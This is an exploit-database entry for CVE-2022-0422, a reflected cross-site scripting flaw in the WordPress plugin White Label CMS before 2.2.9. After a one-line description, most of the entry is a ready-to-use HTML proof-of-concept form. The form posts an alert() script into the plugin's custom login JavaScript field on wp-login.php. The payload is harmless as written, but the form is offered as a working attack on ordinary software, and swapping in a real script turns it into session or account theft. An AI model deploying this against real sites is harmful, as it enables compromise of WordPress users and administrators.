Exploit for White Label MS < 2.2.9 - Reflected Cross-Site Scripting CVE-2022-0422

Name: Exploit for White Label MS < 2.2.9 - Reflected Cross-Site Scripting CVE-2022-0422
Rating: 5 (158 reviews)

2022-02-07 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:429BE4EB-8A6B-4531-9465-9EF0D35C12CC
In v < 2.2.8, both unauthenticated and authenticated users can be attacked with it. In 2.2.8, it will only trigger against authenticated user

<html>
    <body>
        <form action="https://example.com/wp-login.php?wlcms-action=preview" method="POST">
            <input type="text" value='alert(/XSS/);' name="wlcms[_login_custom_js]" />
            <input type="submit" value="Exploit me pls" />
        </form>
    </body>
</html>